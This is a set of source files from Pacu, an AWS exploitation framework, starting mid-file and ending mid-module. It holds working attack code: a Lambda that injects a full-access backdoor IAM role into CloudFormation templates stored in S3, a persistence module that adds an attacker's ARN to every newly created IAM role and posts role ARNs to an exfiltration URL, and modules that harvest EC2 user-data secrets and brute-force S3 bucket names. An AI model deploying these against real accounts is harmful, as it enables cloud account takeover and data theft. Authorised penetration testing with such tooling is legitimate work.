    aws_session_token=os.getenv('S3_AWS_SESSION_TOKEN') or None,
)

s3: 'mypy_boto3_s3.S3Client' = sess.client('s3', region_name='us-east-1')


@app.lambda_function()
def update_template(event: dict, context: dict):
    event = S3Event(event, context)

    arn = sess.client('sts').get_caller_identity()['Arn']
    print(f"Caller identity used for updating cross account S3 Objects: {arn}")

    update(s3, event.bucket, event.key)

    return {
        "statusCode": 200,
        "body": '{ "message": "template updated"}',
    }


def update(s3, bucket: str, key: str):
    body = fetch(s3, bucket, key)

    if already_pwned(body):
        print("already pwned skipping")
        return None

    new_body = add_role_bytes(body)
    s3.put_object(Bucket=bucket, Key=key, Body=new_body)


def already_pwned(body: bytes) -> bool:
    return BACKDOORED_IAM_ROLE_NAME in body


def fetch(s3, bucket: str, key: str):
    resp = s3.get_object(Bucket=bucket, Key=key)
    return resp['Body'].read()


def add_role_bytes(cfn: bytes) -> str:
    try:
        cfn = json.loads(cfn)
        cfn_type = CfnType.JSON
    except json.JSONDecodeError:
        print("[INFO] Input is not json, likely yaml")
        cfn = yaml.safe_load(cfn)
        cfn_type = CfnType.YAML

    cfn = add_role_dict(cfn)

    if cfn_type == CfnType.JSON:
        cfn = json.dumps(cfn)
    elif cfn_type == CfnType.YAML:
        cfn = yaml.safe_dump(cfn)
    else:
        raise Exception(f"unexpected CfnType: {cfn_type.name}")
    return cfn


def add_role_dict(cfn: dict) -> dict:
    principal = os.environ['PRINCIPAL']
    if not principal:
        raise UserWarning("Could not find PRINCIPAL in the environment.")
    cfn['Resources'][BACKDOORED_IAM_ROLE_NAME.decode()] = {
        'Type': 'AWS::IAM::Role',
        'Properties': {
            'AssumeRolePolicyDocument': json.dumps(
                {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Effect": "Allow",
                            "Principal": {"AWS": principal.strip()},
                            "Action": "sts:AssumeRole"
                        }
                    ]
                }
            ),
            "Policies": [
                {
                    "PolicyName": "default",
                    "PolicyDocument": {
                        "Version": "2012-10-17",
                        "Statement": [
                            {
                                "Effect": "Allow",
                                "Action": "*",
                                "Resource": "*"
                            }
                        ]
                    }
                }
            ]
        }
    }
    return cfn




#!/usr/bin/env python3
import argparse
import base64
import os
import gzip

from botocore.exceptions import ClientError

from pacu.core.lib import strip_lines, save, downloads_dir
from pacu.core.secretfinder.utils import regex_checker, Color
from pacu import Main

module_info = {
    'name': 'ec2__download_userdata',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'ENUM',
    'one_liner': 'Downloads User Data from EC2 instances/launch templates.',
    'description': strip_lines('''
        This module will take a list of EC2 instance IDs and/or EC2 launch template IDs and request then download the
        User Data associated with each instance/template. All of the data will be saved to
        ~/.local/share/pacu/sessions/[session_name]/downloads/ec2_user_data/.
    '''),
    'services': ['EC2'],
    'prerequisite_modules': ['ec2__enum'],
    'arguments_to_autocomplete': ['--instance-ids', '--template-ids', '--filter'],
}

parser = argparse.ArgumentParser(add_help=True, description=module_info['description'])

parser.add_argument('--instance-ids', required=False, default=None, help=strip_lines('''
    One or more (comma separated) EC2 instance IDs with their regions in the format instance_id@region. Defaults to all
    EC2 instances in the database.
'''))
parser.add_argument('--template-ids', required=False, default=None, help=strip_lines('''
    One or more (comma separated) EC2 launch template IDs with their regions in the format template_id@region. Defaults
    to all EC2 launch templates in the database.
'''))
parser.add_argument('--filter', required=False, default=False, help=strip_lines('''
    Specify tags, values or tag:value pairs to match before downloading user data. Using format tag_name_only:,
    :value_only, tag:value_pair
'''))

def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print

    fetch_data = pacu_main.fetch_data
    ######

    instances = []
    templates = []
    summary_data = {'instance_downloads': 0, 'template_downloads': 0}

    if args.instance_ids is not None:
        for instance in args.instance_ids.split(','):
            instance_id, region = instance.split('@')
            instances.append({
                'InstanceId': instance_id,
                'Region': region
            })
    elif args.template_ids is None:
        # If args.instance_ids was not passed in,
        # only fetch instances if args.template_ids
        # is also None
        if fetch_data(['EC2', 'Subnets'], module_info['prerequisite_modules'][0], '--instances') is False:
            print('Pre-req module not run successfully. Exiting...')
            return None
        instances = session.EC2['Instances']

    if args.template_ids is not None:
        for template in args.template_ids.split(','):
            template_id, region = template.split('@')
            templates.append({
                'LaunchTemplateId': template_id,
                'Region': region
            })
    elif args.instance_ids is None:
        # If args.template_ids was not passed in,
        # only fetch templates if args.instance_ids
        # is also None
        if fetch_data(['EC2', 'LaunchTemplates'], module_info['prerequisite_modules'][0], '--launch-templates') is False:
            print('Pre-req module not run successfully. Exiting...')
            templates = []
        else:
            templates = session.EC2['LaunchTemplates']

    if instances:
        print('Targeting {} instance(s)...'.format(len(instances)))
        for instance in instances: 

            # if the filter is actived check the tags. If tags do not match skip instance
            if args.filter and not has_tags(args.filter.split(','), instance):
                continue

            instance_id = instance['InstanceId']
            region = instance['Region']
            client = pacu_main.get_boto3_client('ec2', region)

            try:
                user_data = client.describe_instance_attribute(
                    InstanceId=instance_id,
                    Attribute='userData'
                )['UserData']
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'AccessDenied':
                    print('  Access denied to DescribeInstanceAttribute.')
                    print('Skipping the rest of the instances...')
                    break
                else:
                    print('  ' + code)

            if 'Value' in user_data.keys():
                decoded = base64.b64decode(user_data['Value'])

                try:
                    decompressed = gzip.decompress(decoded)
                    formatted_user_data = '{}@{}:\n{}\n\n'.format(
                        instance_id,
                        region,
                        decompressed.decode('utf-8', 'backslashreplace')
                    )
                except:
                    formatted_user_data = '{}@{}:\n{}\n\n'.format(
                        instance_id,
                        region,
                        decoded.decode('utf-8', 'backslashreplace')
                    )

                print('  {}@{}: User Data found'.format(instance_id, region))

                # Check for secrets
                find_secrets(formatted_user_data)

                # Write to the "all" file
                with save('ec2_user_data/all_user_data.txt', 'a+') as f:
                    f.write(formatted_user_data)
                # Write to the individual file
                with save('ec2_user_data/{}.txt'.format(instance_id)) as f:
                    f.write(formatted_user_data.replace('\\t', '\t').replace('\\n', '\n').rstrip())
                summary_data['instance_downloads'] += 1
            else:
                print('  {}@{}: No User Data found'.format(instance_id, region))
        print()
    else:
        print('No instances to target.\n')

    if templates:
        print('Targeting {} launch template(s)...'.format(len(templates)))
        for template in templates:
            template_id = template['LaunchTemplateId']
            region = template['Region']
            client = pacu_main.get_boto3_client('ec2', region)

            all_versions = []

            try:
                response = client.describe_launch_template_versions(
                    LaunchTemplateId=template_id
                )
                all_versions.extend(response['LaunchTemplateVersions'])
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'AccessDenied':
                    print('  Access denied to DescribeLaunchTemplateVersions.')
                    print('Skipping the rest of the launch templates...\n')
                    break
                else:
                    print('  ' + code)

            while response.get('NextToken'):
                response = client.describe_launch_template_versions(
                    LaunchTemplateId=template_id,
                    NextToken=response['NextToken']
                )
                all_versions.extend(response['LaunchTemplateVersions'])

            for version in all_versions:
                if version['LaunchTemplateData'].get('UserData'):
                    try:
                        was_unzipped = False
                        user_data = version['LaunchTemplateData']['UserData']
                        formatted_user_data = '{}-version-{}@{}:\n{}\n\n'.format(
                            template_id,
                            version['VersionNumber'],
                            region,
                            base64.b64decode(user_data).decode('utf-8')
                        )
                    except UnicodeDecodeError as error:
                        try:
                            decoded = base64.b64decode(user_data)
                            decompressed = gzip.decompress(decoded)
                            formatted_user_data = '{}@{}:\n{}\n\n'.format(
                                instance_id,
                                region,
                                decompressed.decode('utf-8')
                            )
                            was_unzipped = True
                        except:
                            print('ERROR: GZIP decrompressing template data')
                    print('  {}-version-{}@{}: User Data found'.format(template_id, version['VersionNumber'], region))
                    if was_unzipped:
                        print('    Gzip decoded the User Data')

                    # Write to the "all" file
                    with save('ec2_user_data/all_user_data.txt', 'a+') as f:
                        f.write(formatted_user_data)
                    # Write to the individual file
                    with save('ec2_user_data/{}-version-{}.txt'.format(template_id, version['VersionNumber'])) as f:
                        f.write(formatted_user_data.replace('\\t', '\t').replace('\\n', '\n').rstrip())
                    summary_data['template_downloads'] += 1
                else:
                    print('  {}-version-{}@{}: No User Data found'.format(template_id, version['VersionNumber'], region))
        print()
    else:
        print('No launch templates to target.\n')

    return summary_data


def find_secrets(userdata):
    detections = regex_checker(userdata)
    [Color.print(Color.GREEN, '\tDetected {}: {}'.format(itemkey, detections[itemkey])) for itemkey in detections]


def has_tags(filters, userdata):
    try:
        tags = userdata['Tags']
    # Instance has no Key
    except KeyError:
        return False
    
    # If there is only one tag it will be a dict. Convert it to a list
    if isinstance(tags, dict):
        tags = list(tags)

    for tag in tags:
        for item in filters:
            # This splits items at :
            item_list = item.split(':')
            
            # Item is a key value pair
            if len(item_list[0]) and len(item_list[1]) > 0:
                if '{}:{}'.format(item_list[0], item_list[1]) == "{}:{}".format(tag['Key'], tag['Value']):
                    return True
            # Key only 
            elif len(item_list[0]) > 0:
                if item_list[0] == tag['Key']:
                    return True
            # Value only
            else:
                if item_list[1] in tag['Value']:
                    return True
    # No matches were found 
    return False


def summary(data, pacu_main: 'Main'):
    session = pacu_main.get_active_session()
    out = '  Downloaded EC2 User Data for {} instance(s) and {} launch template(s) to {}/ec2_user_data/.\n'.format(
        downloads_dir(), data['instance_downloads'], data['template_downloads'], session.name
    )
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from pathlib import Path
from copy import deepcopy
import random
import string
import os

from pacu.core.lib import module_data_dir
from pacu.utils import zip_file

module_info = {
    'name': 'lambda__backdoor_new_roles',

    'author': 'Spencer Gietzen of Rhino Security Labs based on code from Daniel Grzelak (https://github.com/dagrz/aws_pwn/blob/master/persistence/backdoor_created_roles_lambda/backdoor_created_roles_lambda.py)',

    'category': 'PERSIST',

    'one_liner': 'Creates a Lambda function and CloudWatch Events rule to backdoor new IAM roles.',

    'description': 'This module creates a new Lambda function and an accompanying CloudWatch Events rule that will trigger upon a new IAM role being created in the account. The function will automatically add the supplied ARN to the assume role policy document and exfiltrate the ARN of the role so you can assume it. The function and rule will always be created in us-east-1, as that is the only CloudWatch region that gets sent IAM events. Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in us-east-1.',

    'services': ['Lambda', 'Events', 'IAM'],

    'prerequisite_modules': ['iam__enum_users_roles_policies_groups'],

    'external_dependencies': [],

    'arguments_to_autocomplete': ['--arn', '--exfil-url','--role-arn', '--cleanup'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--arn', required=False, default=None, help='The ARN of your own IAM user or role that you want to add to the assume role policy document.')
parser.add_argument('--exfil-url', required=False, default=None, help='The URL to POST backdoored roles\' ARNs to, so you can assume them.')
parser.add_argument('--role-arn', required=False, default=None, help='The role should allow Lambda to assume it and have at least the IAM UpdateAssumeRolePolicy and GetRole permissions')
parser.add_argument('--cleanup', required=False, default=False, action='store_true', help='Run the module in cleanup mode. This will remove any known backdoors that the module added from the account.')


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ######
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data

    MODULE_PATH = Path(__file__).parent
    MODULE_SESSION_PATH = module_data_dir(module_info['name'])
    CREATED_LAMBDA_FUNCTIONS_PATH = MODULE_SESSION_PATH/'created-lambda-functions.txt'
    CREATED_CLOUDWATCH_EVENTS_RULES_PATH = MODULE_SESSION_PATH/'created-cloudwatch-events-rules.txt'
    LAMBDA_FUNCTION_ZIP_PATH = MODULE_SESSION_PATH/'lambda_function.zip'
    ######

    if args.cleanup:
        created_lambda_functions = []
        created_cwe_rules = []

        if os.path.isfile(CREATED_LAMBDA_FUNCTIONS_PATH):
            with open(CREATED_LAMBDA_FUNCTIONS_PATH, 'r') as f:
                created_lambda_functions = f.readlines()
        if os.path.isfile(CREATED_CLOUDWATCH_EVENTS_RULES_PATH):
            with open(CREATED_CLOUDWATCH_EVENTS_RULES_PATH, 'r') as f:
                created_cwe_rules = f.readlines()

        if created_lambda_functions:
            delete_function_file = True
            for function in created_lambda_functions:
                name = function.rstrip()
                print('  Deleting function {}...'.format(name))
                client = pacu_main.get_boto3_client('lambda', 'us-east-1')
                try:
                    client.delete_function(
                        FunctionName=name
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    if code == 'AccessDeniedException':
                        print('  FAILURE: MISSING NEEDED PERMISSIONS')
                    else:
                        print(code)
                    delete_function_file = False
                    break
            if delete_function_file:
                try:
                    os.remove(CREATED_LAMBDA_FUNCTIONS_PATH)
                except Exception as error:
                    print('  Failed to remove {}'.format(str(CREATED_LAMBDA_FUNCTIONS_PATH)))
                    print('    {}: {}'.format(type(error), error))

        if created_cwe_rules:
            delete_cwe_file = True
            for rule in created_cwe_rules:
                name = rule.rstrip()
                print('  Deleting rule {}...'.format(name))
                client = pacu_main.get_boto3_client('events', 'us-east-1')
                try:
                    client.remove_targets(
                        Rule=name,
                        Ids=['0']
                    )
                    client.delete_rule(
                        Name=name
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    if code == 'AccessDeniedException':
                        print('  FAILURE: MISSING NEEDED PERMISSIONS')
                    else:
                        print(code)
                    delete_cwe_file = False
                    break
            if delete_cwe_file:
                try:
                    os.remove(CREATED_CLOUDWATCH_EVENTS_RULES_PATH)
                except Exception as error:
                    print('  Failed to remove {}'.format(str(CREATED_CLOUDWATCH_EVENTS_RULES_PATH)))
                    print('    {}: {}'.format(type(error), error))

        print('Completed cleanup mode.\n')
        return {'cleanup': True}

    if not args.exfil_url:
        print('  --exfil-url is required if you are not running in cleanup mode!')
        return

    if not args.arn:
        print('  --arn is required if you are not running in cleanup mode!')
        return

    data = {'functions_created': 0, 'rules_created': 0, 'successes': 0}

    created_resources = {'LambdaFunctions': [], 'CWERules': []}
    
    if not args.role_arn:
        target_role_arn = input('  What role should be used? Note: The role should allow Lambda to assume it and have at '
                                'least the IAM UpdateAssumeRolePolicy and GetRole permissions. Enter the ARN now or just '
                                'press enter to enumerate a list of possible roles to choose from: ')
        if not target_role_arn:
            if fetch_data(['IAM', 'Roles'], module_info['prerequisite_modules'][0], '--roles', force=True) is False:
                print('Pre-req module not run successfully. Exiting...')
                return None
            roles = deepcopy(session.IAM['Roles'])

            print('Found {} roles. Choose one below.'.format(len(roles)))
            for i in range(0, len(roles)):
                print('  [{}] {}'.format(i, roles[i]['RoleName']))
            choice = input('Choose an option: ')
            target_role_arn = roles[int(choice)]['Arn']
    else:
        target_role_arn=args.role_arn

    # Import the Lambda function and modify the variables it needs
    with open(MODULE_PATH/'lambda_function.py.bak', 'r') as f:
        source_code = f.read()

    source_code = source_code.replace('POST_URL', args.exfil_url).replace('BACKDOOR_ARN', args.arn)

    # Zip the Lambda function
    try:
        print('  Zipping the Lambda function...\n')
        zip_data = {'lambda_function.py': source_code}
        zip_file_bytes = zip_file(LAMBDA_FUNCTION_ZIP_PATH, zip_data)
    except Exception as error:
        print('Failed to zip the Lambda function locally: {}\n'.format(error))
        return data

    client = pacu_main.get_boto3_client('lambda', 'us-east-1')

    try:
        function_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(15))
        response = client.create_function(
            FunctionName=function_name,
            Runtime='python3.9',
            Role=target_role_arn,
            Handler='lambda_function.lambda_handler',
            Code={
                'ZipFile': zip_file_bytes
            }
        )
        lambda_arn = response['FunctionArn']
        print('  Created Lambda function: {}'.format(function_name))
        data['functions_created'] += 1
        created_resources['LambdaFunctions'].append(function_name)

        client = pacu_main.get_boto3_client('events', 'us-east-1')

        response = client.put_rule(
            Name=function_name,
            EventPattern='{"source":["aws.iam"],"detail-type":["AWS API Call via CloudTrail"],"detail":{"eventSource":["iam.amazonaws.com"],"eventName":["CreateRole"]}}',
            State='ENABLED'
        )
        print('  Created CloudWatch Events rule: {}'.format(response['RuleArn']))
        data['rules_created'] += 1

        client = pacu_main.get_boto3_client('lambda', 'us-east-1')

        client.add_permission(
            FunctionName=function_name,
            StatementId=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10)),
            Action='lambda:InvokeFunction',
            Principal='events.amazonaws.com',
            SourceArn=response['RuleArn']
        )

        client = pacu_main.get_boto3_client('events', 'us-east-1')

        response = client.put_targets(
            Rule=function_name,
            Targets=[
                {
                    'Id': '0',
                    'Arn': lambda_arn
                }
            ]
        )
        if response['FailedEntryCount'] > 0:
            print('Failed to add the Lambda function as a target to the CloudWatch rule. Failed entries:')
            print(response['FailedEntries'])
        else:
            print('  Added Lambda target to CloudWatch Events rule.')
            data['successes'] += 1
            created_resources['CWERules'].append(function_name)
    except ClientError as error:
        code = error.response['Error']['Code']
        if code == 'AccessDeniedException':
            print('  FAILURE: MISSING NEEDED PERMISSIONS')
        else:
            print(code)

    if created_resources['LambdaFunctions']:
        with open(CREATED_LAMBDA_FUNCTIONS_PATH, 'w+') as f:
            f.write('\n'.join(created_resources['LambdaFunctions']))
    if created_resources['CWERules']:
        with open(CREATED_CLOUDWATCH_EVENTS_RULES_PATH, 'w+') as f:
            f.write('\n'.join(created_resources['CWERules']))

    print('Warning: Your backdoor will not execute if the account does not have an active CloudTrail trail in us-east-1.')

    return data


def summary(data, pacu_main):
    if data.get('cleanup'):
        return '  Completed cleanup of Lambda functions and CloudWatch Events rules.'

    return '  Lambda functions created: {}\n  CloudWatch Events rules created: {}\n  Successful backdoor deployments: {}\n'.format(data['functions_created'], data['rules_created'], data['successes'])



#!/usr/bin/env python3
import argparse
from copy import deepcopy
import time
import os

from botocore.exceptions import ClientError

from pacu.core.lib import downloads_dir

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'rds__enum_snapshots',

    # Name and any other notes about the author
    'author': 'Ng Song Guan (GovTech-CSG)',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'ENUM',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates RDS snapshots and logs any without encryption.',

    # Description about what the module does and how it works
    'description': 'This module will enumerate all the RDS snapshots (including cluster snapshots) of the account and also snapshots that have been shared by other accounts to this account. It can also enumerate the snapshot permissions in the account and save the data to the current session. It will also note whether or not each snapshot is encrypted, then write a list of the unencrypted snapshots to ./sessions/[current_session_name]/downloads/unencrypted_rds_snapshots_[timestamp].csv in .CSV format. For written files, DB cluster snapshots will have a "(cluster)" added beside its identifier.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['RDS'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--regions', '--snapshot-permissions', '--no-include-shared'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument(
    '--regions',
    required=False,
    default=None,
    help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.'
)
parser.add_argument(
    '--snapshot-permissions',
    required=False,
    default=False,
    action='store_true',
    help='Capture permissions for each found snapshot that belongs to this account. Permissions for snapshots shared to this account are not included. Found permissions will be captured in the database and written to the sessions downloads directory as rds_snapshot_permissions.txt'
)

parser.add_argument(
    '--no-include-shared',
    required=False,
    default=False,
    action='store_true',
    help='Do not include snapshots shared to this account by other accounts.'
)


def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    rds_data = deepcopy(session.RDS)
    if 'Snapshots' not in rds_data.keys():
        rds_data['Snapshots'] = []
    session.update(pacu_main.database, RDS=rds_data)

    if args.regions is None:
        regions = get_regions('rds')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    now = time.time()
    all_snaps = []
    snapshots_csv_data = []
    shared_by_other_account_snapshots = []
    snapshot_permissions = {
        'Public': [],
        'Shared': {},
        'Private': [],
    }

    def fetch_rds_data(client, func, key, print, **kwargs):
        caller = getattr(client, func)
        try:
            response = caller(**kwargs)
            data = response[key]
            if isinstance(data, (dict, str)):
                return data
            while 'Marker' in response:
                response = caller({**kwargs, **{'Marker': response['Marker']}})
                data.extend(response[key])
            return data

        except ClientError as error:
            print('  FAILURE:')
            code = error.response['Error']['Code']
            if code == 'AccessDenied':
                print('    MISSING NEEDED PERMISSIONS for ' + func)
            else:
                print(code)
            print('    Skipping ' + func)
        return []

    # Create rds directory
    directory = str(downloads_dir()/'rds')
    if not os.path.exists(directory):
        os.makedirs(directory)

    for region in regions:
        print('Starting region {} (this may take a while if there are thousands of RDS snapshots)...'.format(region))
        # Start RDS Snapshots in this region
        count = 0

        rdsClient = pacu_main.get_boto3_client('rds', region)

        # Enumerate normal snapshots
        rdsSnapshotData = fetch_rds_data(rdsClient, 'describe_db_snapshots', 'DBSnapshots',
                                print, IncludeShared=not args.no_include_shared, MaxRecords=100)

        # Enumerate cluster snapshots
        rdsClusterSnapshotData = fetch_rds_data(rdsClient, 'describe_db_cluster_snapshots', 'DBClusterSnapshots',
                                print, IncludeShared=not args.no_include_shared, MaxRecords=100)

        # Check basic info for normal snapshots
        for snapshot in rdsSnapshotData:
            all_snaps.append(snapshot)
            snapshot['Region'] = region

            if snapshot['Encrypted'] is False:
                snapshots_csv_data.append('{},{}\n'.format(snapshot['DBSnapshotIdentifier'], region))

            if snapshot['SnapshotType'] == 'shared':
                    shared_by_other_account_snapshots.append(snapshot['DBSnapshotIdentifier'])

        # Check basic info for cluster snapshots
        for clusterSnapshot in rdsClusterSnapshotData:
            all_snaps.append(clusterSnapshot)
            clusterSnapshot['Region'] = region

            if clusterSnapshot['StorageEncrypted'] is False:
                snapshots_csv_data.append('{},{}\n'.format(clusterSnapshot['DBClusterSnapshotIdentifier'] + " (cluster)", region))

            if clusterSnapshot['SnapshotType'] == 'shared':
                    shared_by_other_account_snapshots.append(clusterSnapshot['DBClusterSnapshotIdentifier'] + " (cluster)")

        # Handle permissions check for both types of snapshots
        if args.snapshot_permissions and (rdsSnapshotData or rdsClusterSnapshotData):
            print('  Starting enumeration for own account\'s Snapshot Permissions...')

            for snapshot in rdsSnapshotData:
                if snapshot['SnapshotType'] == 'shared':
                    continue  # Ignore permission check for snapshots shared by other account so move on to next snapshot

                # Automated snapshots are always private
                if snapshot['SnapshotType'] == 'automated':
                    snapshot_permissions['Private'].append(snapshot['DBSnapshotIdentifier'])

                # Only manual snapshots will be updated with RestoreAttributeValues
                else:
                    attributes = fetch_rds_data(rdsClient, "describe_db_snapshot_attributes", 'DBSnapshotAttributesResult',
                                        print, DBSnapshotIdentifier=snapshot['DBSnapshotIdentifier'])

                    # If user does not have permission to DescribeDBSnapshotAttributes, skip this loop
                    if attributes == []:
                        break

                    for attr in attributes['DBSnapshotAttributes']:
                        if attr['AttributeName'] == 'restore':
                            snapshot['RestoreAttributeValues'] = attr['AttributeValues']
                            break

                    if not snapshot['RestoreAttributeValues']:
                        snapshot_permissions['Private'].append(snapshot['DBSnapshotIdentifier'])
                    elif snapshot['RestoreAttributeValues'][0] == 'all':
                        snapshot_permissions['Public'].append(snapshot['DBSnapshotIdentifier'])
                    else:
                        snapshot_permissions['Shared'][snapshot['DBSnapshotIdentifier']] = snapshot['RestoreAttributeValues']

            for clusterSnapshot in rdsClusterSnapshotData:
                if clusterSnapshot['SnapshotType'] == 'shared':
                    continue  # Ignore permission check for snapshots shared by other account so move on to next snapshot

                # Automated snapshots are always private
                if clusterSnapshot['SnapshotType'] == 'automated':
                    snapshot_permissions['Private'].append(clusterSnapshot['DBClusterSnapshotIdentifier'] + " (cluster)")

                # Only manual snapshots will be updated with RestoreAttributeValues
                else:
                    attributes = fetch_rds_data(rdsClient, "describe_db_cluster_snapshot_attributes", 'DBClusterSnapshotAttributesResult',
                                        print, DBClusterSnapshotIdentifier=clusterSnapshot['DBClusterSnapshotIdentifier'])

                    # If user does not have permission to DescribeDBClusterSnapshotAttributes, skip this loop
                    if attributes == []:
                        break

                    for attr in attributes['DBClusterSnapshotAttributes']:
                        if attr['AttributeName'] == 'restore':
                            clusterSnapshot['RestoreAttributeValues'] = attr['AttributeValues']
                            break

                    if not clusterSnapshot['RestoreAttributeValues']:
                        snapshot_permissions['Private'].append(clusterSnapshot['DBClusterSnapshotIdentifier'] + " (cluster)")
                    elif clusterSnapshot['RestoreAttributeValues'][0] == 'all':
                        snapshot_permissions['Public'].append(clusterSnapshot['DBClusterSnapshotIdentifier'] + " (cluster)")
                    else:
                        snapshot_permissions['Shared'][clusterSnapshot['DBClusterSnapshotIdentifier'] + " (cluster)"] = clusterSnapshot['RestoreAttributeValues']

        count += len(rdsSnapshotData)
        count += len(rdsClusterSnapshotData)

        print('    {} snapshot(s) found'.format(count))

    summary_data = {'snapshot_permissions': args.snapshot_permissions}

    rds_data['Snapshots'] = all_snaps
    summary_data['snapshots'] = len(rds_data['Snapshots'])
    unencrypted_snapshots_csv_path = '{}/unencrypted_rds_snapshots_{}.csv'.format(directory, now)
    
    if (snapshots_csv_data):
        with open(unencrypted_snapshots_csv_path, 'w+') as unencrypted_snapshots_csv:
            unencrypted_snapshots_csv.write('Snapshot Identifier ,Region\n')
            print('  Writing data for {} unencrypted snapshots...'.format(len(snapshots_csv_data)))
            for line in snapshots_csv_data:
                unencrypted_snapshots_csv.write(line)
        summary_data['snapshots_csv_path'] = unencrypted_snapshots_csv_path

    if not args.no_include_shared:
        summary_data['Shared by other account'] = len(shared_by_other_account_snapshots)
    else:
        summary_data['Shared by other account'] = False

    if args.snapshot_permissions:
        permission_data = {
            'Public': len(snapshot_permissions['Public']),
            'Shared': len(snapshot_permissions['Shared']),
            'Private': len(snapshot_permissions['Private']),
        }
        temp = permission_data.copy()
        summary_data.update(temp)

        path = str(downloads_dir()/f"rds_snapshot_permissions_{now}.txt")
        with open(path, 'w') as out_file:
            out_file.write('Public:\n')
            for public in snapshot_permissions['Public']:
                out_file.write('    {}\n'.format(public))
            out_file.write('Shared:\n')
            for snap in snapshot_permissions['Shared']:
                out_file.write('    {}\n'.format(snap))
                for aws_id in snapshot_permissions['Shared'][snap]:
                    out_file.write('        {}\n'.format(aws_id))
            out_file.write('Private:\n')
            for private in snapshot_permissions['Private']:
                out_file.write('    {}\n'.format(private))
            if not args.no_include_shared:
                out_file.write('Shared by other account:\n')
                for sharedWithAccount in shared_by_other_account_snapshots:
                    out_file.write('    {}\n'.format(sharedWithAccount))
            summary_data['snapshot-permissions-path'] = path
    session.update(pacu_main.database, RDS=rds_data)

    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'snapshots' in data:
        out += '  {} RDS Snapshots found\n'.format(data['snapshots'])
        if data['Shared by other account']:
            out += '    {} of these snapshots are shared by other accounts to this account\n'.format(data['Shared by other account'])

    if 'snapshots_csv_path' in data:
        out += '  Unencrypted snapshot information written to:\n    {}\n'.format(data['snapshots_csv_path'])
    if data['snapshot_permissions']:
        out += '  Snapshot Permissions: \n'
        out += '    {} Public snapshots found\n'.format(data['Public'])
        out += '    {} Private snapshots found\n'.format(data['Private'])
        out += '    {} Shared snapshots found\n'.format(data['Shared'])
        out += '      Snapshot permissions information written to: {}\n'.format(data['snapshot-permissions-path'])
    return out



#!/usr/bin/env python3
import argparse
import logging
from queue import Queue
import subprocess
from threading import Thread


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 's3__bucket_finder',

    # Name and any other notes about the author
    'author': 'Dwight Hohnstein',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'RECON_UNAUTH',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Enumerates/bruteforces S3 buckets based on different parameters.',

    # Description about what the module does and how it works
    'description': 'This module searches across every AWS region for a variety of bucket names based on a domain name, subdomains, affixes given and more. Currently the tool will only present to you whether or not the bucket exists or if they are listable.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['S3'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [
        'https://github.com/aboul3la/Sublist3r.git',
        'https://raw.githubusercontent.com/RhinoSecurityLabs/Security-Research/master/tools/aws-pentest-tools/s3/Buckets.txt'
    ],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': [
        '-f', '--file',
        '-r', '--regions',
        '-b', '--brute',
        '-t', '--threads',
        '-g', '--grep',
        '--sublist3r',
        '--subbrute',
        '-d', '--domain',
        '-v', '--verbose'
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

# Arguments that accept multiple options (such as --usernames) should be comma-separated (such as --usernames bill,mike,tom)
# Arguments that are region-specific (such as --instance-ids) should use an @ symbol to separate the data and its region (such as --instance-ids 123@us-west-1,54252@us-east-1,9999@ap-south-1
parser.add_argument('-f', '--file', help='Read affixes from FILE.')
parser.add_argument('-r', '--regions', default='all', help='Comma separated list of regions to query for bucket names. Default is all.')
parser.add_argument('-b', '--brute', action='store_true', help='Use default brute force list in Buckets.txt')
parser.add_argument('-t', '--threads', default=6, help='Max number of threads, default is 6.')
parser.add_argument('-g', '--grep', help='Will recursively list files from buckets (when listable) and grep for keywords FILE. Ex: -g sensitive_keywords.txt')
parser.add_argument('--sublist3r', action='store_true', default=False, help='Retrieve list of subdomains and use this to query against S3.')
parser.add_argument('--subbrute', action='store_true', default=False, help='Enable sublist3r\'s subbrute module when querying for subdomains.')
parser.add_argument('-d', '--domain', help='Base domain to be queried against.', required=True)
parser.add_argument('-v', '--verbose', action='store_true', help='Enable debug messages in logs.')

bucket_q = Queue()
bucket_q_size = 0

# Bucketlist to sort buckets based on permissions.
